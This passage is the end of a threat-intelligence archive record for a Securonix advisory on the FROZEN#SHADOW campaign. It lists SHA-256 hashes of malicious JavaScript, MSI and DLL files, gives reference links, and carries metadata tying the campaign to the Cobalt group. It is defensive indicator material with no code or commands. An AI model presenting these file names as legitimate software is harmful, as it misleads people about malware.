C122596E25A4DAD1D46D4AB983F4EF15BFA7B65582B7C311F404036766498105\r\nDoc_i93_65b929565-14q83944h2246-4336m9.js E8E76B851FC78D87FE58AD7D29BC6356A8965236D1B96C5F572334DD695D5DE9\r\nDoc_f98_58y658432-41b75184w6866-3921d1.js 791C28D4201E8B9EA5162FBEE3908FEB34793B1C51F5AAEDC43916E86068248D\r\nDoc_q80_66b246938-8806024o9126-5008b9.js CAF8295570E8A8244C7099A8EABFD1BD55EA50F026B4461E9F0F5425D54703E8\r\nDoc_m42_81h118103-88o62135w8623-1999q9.js 092962BC268390DEBF17CD148D03147CDF919E442E61C92DE01EAC3BDB34B1C1\r\nDoc_q35_64r067638-76a88713i3606-7493z7.js 24CB279EEBCD49E1327905AB2BD19B9B2E09EFA3E0A5E1875F3989C398A5DA81\r\nLetter_a53_97o318845-76f99823h9630-6740o2.js 8F7A90B540F38712C9C1A5359C6333BBE1091102D6F621B22321E08352C84CFC\r\nLetter_e79_76r514120-22p50913h4206-6851k8.js 0737FA0B403FAB17331C9835497A4F3B2955543E2FAC85009DCC66DF41A015F8\r\nLetter_h21_36b948317-03a99748y3026-8660b8.js 2118C5B95D5D57492B2E8B8C0403E23B21ACC4FF50282F8B6007BA89ADFAA992\r\nLetter_d19_97q517001-52z26072a2831-7463c5.js A557F891F4D50E458D745C7EAF7D0BE3ECEEA36F0398097E977CD3F6EC463875\r\nLetter_t47_39u197519-27b72941k6563-0250a2.js 4D9274CFE7A2BD9A125352271D1634708E1F9B1D70B056D1C1950CB98B8F91FF\r\nLetter_z27_59o257127-14z25707d6443-0555c6.js 3584CA9C1E7E0A38E47F59BB16C21203A60833D0F826294D535A98E7CA76D9C1\r\nLetter_b42_17m561933-22h44391r3880-8554u2.js 63283E012F067A3FFB27ED4FE6803F740C80F6F65213FE5507F0CD1EE0019B96\r\nLetter_t48_42a243569-81n19660f9965-6999u0.js 828EF3E4CA064891836913015C48AC9807ECD43B32F6E7E4BFF29B9FD2E218C9\r\nLetter_o40_58g357086-56q83656a4371-9752z1.js 780B970DAD15835D138546BE9B615FC1B4124C1060A8EFD91B9C52F9C3160D5B\r\n09E7F7428E6ECC68EF036C0751F53985882F6760CF3892F1D26AF44F3B9730DE\r\nmsedgeview.msi 232F8F8DC9E5B9723C43C78CB942CC810EF56E305E4BD650110A484334F568A8\r\n950b84.msi F5BF914415FAF7587958BBDC3312536FD9ABEA647F1541D44D2E757F0E683650\r\n6838aa.msi 08075E8A6DCC6A5FCA089348EDBD5FC07B2B0B26A26A46E0DD401121FDAA88D3\r\n4178fc.msi FF5E40FC794E56FD78FEB6EB6B30794970F7CDB4A767C4095E2D20A90BB0EFE8\r\nslack.msi B9DBE9649C761B0EEE38419AC39DCD7E90486EE34CD0EB56ADDE6B2F645F2960\r\nqual.msi EE1E5B80A1D3D47C7703EA2B6B64EE96283AB3628EE4FA1FEF6D35D1D9051E9F\r\navp.msi DCAE57EC4B69236146F744C143C42CC8BDAC9DA6E991904E6DBF67EC1179286A\r\nmsedge.dll 7018C43EE38190EAE122797869865FD808817F31D766575B43B118AE176C0C68\r\nUpdate_c7e5e126.dll FC21A125287C3539E11408587BCAA6F3B54784D9D458FACBC54994F05D7EF1B0\r\nUpdate_2ffaca76.dll 65DA6D9F781FF5FC2865B8850CFA64993B36F00151387FDCE25859781C1EB711\r\nUpdate_8d74674.dll 805B59E48AF90504024F70124D850870A69B822B8E34D1EE551353C42A338BF7\r\nUpdate_17a3b1e7.dll 7206EAFC475F246E7C9C258AFDAAA64B5193C1C7427D927BE417E53DEC890078\r\nmbae-api-na.dll 9856B816A9D14D3B7DB32F30B07624E4BCDA7F1E265A7BB7A3E3476BFD54A759\r\nmbae-api-na.dll 0EDE3CBE821E4F083FC119274F069C77E64A6A7E8A2C16530317B826A0939979\r\nmbae-api-na.dll 17DDC339B14845BC9D67C5C3CD9A0E617387CC0569131FF3641035D82043EFFA\r\nmbae-api-na.dll 18D60C9C807DA021BC2C31E3BA7EC2737865A8C96060134CAA3CF033E43E26FE\r\nmbae-api-na.dll AE610EB8F8622653B9BE9692A7D2A680B0C2154022704CA58AF0EAEED0066D03\r\nmbae-api-na.dll 7F97ADFF1D298CCF1F3C7991FCB01008DDA22722EBBC11AF48FCBF2ADB58AFB4\r\nforcedelctl.dll 3BCA1DCAEF4430272B9029C9A4BC8BE0D45ECFF66E8DE8679ED30D8AFAB00F6F\r\nReferences:\r\n1. Elegant sLoad Carries Out Spying, Payload Delivery in BITS\r\nhttps://threatpost.com/sload-spying-payload-delivery-bits/151120/\r\n2. GitHub: PaloAltoNetworks/Unit42-timely-threat-intel, 2024-04-15-IOC-for-Contact-Forms-campaign-SSLoad-activity.txt\r\nhttps://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-04-15-IOC-for-Contact-Forms-campaign-SSLoad-activity.txt\r\n3. GitHub: executemalware/Malware-IOCs, 2024-04-17 SSLoad IOCs\r\nhttps://github.com/executemalware/Malware-IOCs/blob/main/2024-04-17%20SSLoad%20IOCs\r\n4. GitHub: xx0hcd/Malleable-C2-Profiles\r\nhttps://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/template.profile\r\n5. Securonix Threat Research Knowledge Sharing Series: On Detection of Real-world Attacks Involving RMM\r\nBehaviors Using Securonix\r\nhttps://www.securonix.com/blog/securonix-threat-research-knowledge-sharing-series-detecting-rmm-behaviors/\r\n6. Hundreds of orgs targeted with emails aimed at stealing NTLM authentication hashes\r\nhttps://www.helpnetsecurity.com/2024/03/05/steals-ntlm-hashes-email/\r\nSource: https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/"
	],
	"report_names": [
		"securonix-threat-research-security-advisory-frozenshadow-attack-campaign"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434387,
	"ts_updated_at": 1775791270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f39ec26a4d5807f2b5f154a15212bd60e84b9099.pdf",
		"text": "https://archive.orkl.eu/f39ec26a4d5807f2b5f154a15212bd60e84b9099.txt",
		"img": "https://archive.orkl.eu/f39ec26a4d5807f2b5f154a15212bd60e84b9099.jpg"
	}
}